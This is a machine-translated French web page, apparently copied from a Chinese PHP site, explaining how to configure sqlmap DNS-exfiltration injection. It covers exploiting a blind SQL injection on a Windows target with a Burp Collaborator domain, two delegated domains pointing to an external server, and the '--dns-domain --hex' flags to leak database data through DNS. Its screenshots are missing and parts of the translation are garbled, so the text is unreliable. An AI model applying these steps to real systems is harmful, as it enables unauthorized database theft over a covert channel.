简体中文(ZH-CN) English(EN) 繁体中文(ZH-TW) 日本語(JA) 한국어(KO) Melayu(MS) Français(FR) Deutsch(DE)
Maison > Opération et maintenance > Sécurité > le corps du texte

Quelle est la méthode de configuration de l'injection sqlmap _dns ?

WBOY
Libérer: 2023-05-12 12:25:06
avant
1315 Les gens l'ont consulté

Il y a trop peu d'articles sur Internet sur l'injection DNS pour sqlmap. Ils ne présentent que brièvement le paramètre --dns-domain. Les articles pratiques pertinents sont soit vagues, soit mentionnés d'un seul coup, ce qui les rend confus (principalement des plats). ), la clé n'est pas encore apportée par le patron). Puis j’ai recommencé en me référant aux méthodes sur Internet.

Les choses qui doivent être préparées sont sqlmap, l'injection aveugle de Windows, deux noms de domaine et un serveur réseau externe.

sqlmap _dns注入配置方法是什么

Une fois, alors que je faisais quelque chose, j'ai rencontré une injection aveugle de temps. Il s'agissait d'une machine Windows et je me suis souvenu de la méthode DNS. injection.

sqlmap _dns注入配置方法是什么

Avant de commencer, je prévois d'utiliser la commande --sql-shell de sqlmap pour tester la charge utile de l'injection DNS

# 🎜 🎜#sqlmap _dns注入配置方法是什么

Allez d'abord sur le client collaborateur dans burpsuite et copiez le nom de domaine qui nous a été attribué par burp

Utilisez sqlmap pour exécuter l'instruction sql

#🎜🎜 ## 🎜🎜#

La demande a été reçue dans burpsuite alors que Sqlmap est toujours en cours d'exécution. sqlmap _dns注入配置方法是什么

352E3 dans 352E3 dans 352E362E3134.9hreqpopru1xgf9skq473yo14sajy8.burpcollaborator.net 62E3134 est le résultat renvoyé après ex. exécution de la version(). sqlmap _dns注入配置方法是什么

Décoder pour obtenir la version de mysql. Eh bien, il n’y a rien de mal avec l’injection DNS à ce stade.

Préparez-vous à configurer deux noms de domaine. Certains articles sur Internet disent qu'un seul est bien, mais cela semble toujours plus gênant. De nombreux fournisseurs de serveurs de noms de domaine ne proposent pas certaines fonctions avancées, il est donc plus facile de le faire. préparez-en deux. sqlmap _dns注入配置方法是什么

www.a.com

www.b.com

Nous configurons d'abord le nom de domaine a-> #

Ajoutez simplement * pour effectuer une analyse panoramique et pointez vers l'IP de notre serveur réseau externe.

Configurons notre nom de domaine b->b.com

sqlmap _dns注入配置方法是什么

C'est encore plus simple, il suffit de modifier le nom de domaine directement Pour le DNS, remplissez simplement ns1.a.com ns2.a.com Vous n’avez rien d’autre à faire.

Attendez ensuite que le nom de domaine prenne effet. Nous allons sur le serveur du réseau externe pour tester si l'analyse est réussie #

sqlmap _dns注入配置方法是什么 Ensuite, la machine locale envoie un ping à hello.b.com et l'envoie au serveur externe. la demande de hello.b.com et la machine locale indique que l'hôte est introuvable. Ne vous inquiétez pas, car aucune résolution n'est définie. Maintenant que tout est configuré, nous pouvons utiliser sqlmap pour l'injection DNS.

Ajoutez simplement le paramètre --dns-domain=b.com --hex à Sqlmap

sqlmap _dns注入配置方法是什么

À cette étape, sqlmap restera bloqué et vous demandera de configurer une instance de serveur DNS

sqlmap _dns注入配置方法是什么Direct ctrl+c

#🎜 🎜# Invite indiquant que la récupération des données via le canal DNS a réussi. sqlmap _dns注入配置方法是什么

La vitesse d'injection est aussi rapide que le rapport d'erreurs et l'union, vous n'avez donc plus à supporter la vitesse lente.

Ce qui précède est le contenu détaillé de. pour plus d'informations, suivez d'autres articles connexes sur le site Web de PHP en chinois!

Étiquettes associées:
dns sqlmap
source:yisu.com
Article précédent:Comment implémenter l'analyse de l'injection temporelle sqlmap Article suivant:À quoi fait référence le format de trame VLAN ?
Déclaration de ce site Web
Le contenu de cet article est volontairement contribué par les internautes et les droits d'auteur appartiennent à l'auteur original. Ce site n'assume aucune responsabilité légale correspondante. Si vous trouvez un contenu suspecté de plagiat ou de contrefaçon, veuillez contacter admin@php.cn
Derniers articles par auteur
Derniers numéros
phpstrom2022.3 ne peut pas se connecter au serveur distant Mon serveur est construit avec un panneau Pagoda. Après avoir configuré FTP, j'espère util...
Depuis 2023-09-11 17:08:55
0
0
146
Est-il possible d'effectuer une recherche DNS (convertir le nom d'hôte en adresse IP) en utilisant Javascript côté client ? Je souhaite utiliser Javascript côté client pour effectuer une recherche DNS (voir le mapp...
Depuis 2023-08-21 22:08:37
0
2
179
Qu'est-ce qu'un serveur DNS ? DNS (Domain Name Server) est un serveur qui convertit les noms de domaine et les adresses ...
Depuis 2021-10-19 11:42:15
0
6
2143
Si j'installe le serveur du site Web et le serveur DNS du nom de domaine à la maison, n'ai-je pas besoin de m'enregistrer ? Si j’installe le serveur du site Web et le serveur DNS du nom de domaine à la maison, n’ai...
Depuis 2018-10-22 17:29:40
0
1
1569
Linux - Une erreur DNS se produit, le logiciel peut accéder à Internet et une mauvaise adresse IP s'affiche dans le terminal wget, mais la demande peut aboutir. {code...} {code...} {code...}
Depuis 2017-07-03 11:41:29
0
1
740
Rubriques connexes
Plus>
Recommandations populaires
Tutoriels populaires
Plus>
Tutoriels associés
Recommandations populaires
Derniers cours
Derniers téléchargements
Plus>
effets Web
Code source du site Web
Matériel du site Web
Modèle frontal
À propos de nous Clause de non-responsabilité Sitemap
Site Web PHP chinois:Formation PHP en ligne sur le bien-être public,Aidez les apprenants PHP à grandir rapidement!